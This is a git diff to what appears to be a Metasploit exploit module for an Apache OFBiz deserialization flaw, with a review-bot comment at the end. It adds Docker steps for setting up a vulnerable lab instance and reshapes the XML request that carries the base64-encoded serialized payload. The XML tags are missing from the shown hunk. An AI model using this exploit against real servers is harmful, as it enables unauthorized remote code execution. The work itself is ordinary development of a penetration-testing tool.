diff --git a/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md b/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md index 1fe2594ce8..56504076ec 100644 --- a/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md +++ b/documentation/modules/exploit/linux/http/apache_ofbiz_deserialiation.md @@ -10,6 +10,13 @@ versions prior to 17.12.04. You can use . +1. Initialize the database with demo data (`INIT_DB=2`) + * `docker run --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12` +1. Start a postgres instance + * `docker run --name some-postgres -e POSTGRES_PASSWORD=mysecretpassword -d postgres` +1. Link the database and OFBiz containers + * `docker run -d -p 80:8080 -p 8443:8443 --link some-postgres:postgres opensourceknight/ofbiz:15.12` + ## Verification Steps Follow [Setup](#setup) and [Scenarios](#scenarios). diff --git a/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb b/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb index 022582991e..d593bb4c2b 100644 --- a/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb +++ b/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb @@ -137,14 +137,21 @@ class MetasploitModule < Msf::Exploit::Remote 'data' => Nokogiri::XML(<<~XML, &:noblanks).to_xml - #{rand_text_alphanumeric(8..42)} - - #{rand_text_alphanumeric(8..42)} - - #{Rex::Text.encode_base64(data)} - - + #{rand_text_alphanumeric(8..42)} + + + + + + #{rand_text_alphanumeric(8..42)} + + #{Rex::Text.encode_base64(data)} + + + + + + XML )
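Review bot: The rewritten heredoc under `'data' =>` in `apache_ofbiz_deserialiation.rb` grows from seven lines to fourteen with no comment saying why the request body needs the extra nesting, so a later maintainer cannot tell which wrapper elements are required and which are incidental. The element names are not visible in this view of the hunk, so the exact structure has to be read from the file itself. The same commit adds setup steps for the `opensourceknight/ofbiz:15.12` image to the module documentation, which suggests, but does not confirm, that the new shape is tied to that release. I would add one line directly above the key, for example `# Full XML-RPC nesting is deliberate: <reason / releases it was tested against>`, with the placeholder filled in by the author. The enclosing method starts and ends outside the hunk, so whether nearby code already explains this cannot be checked here.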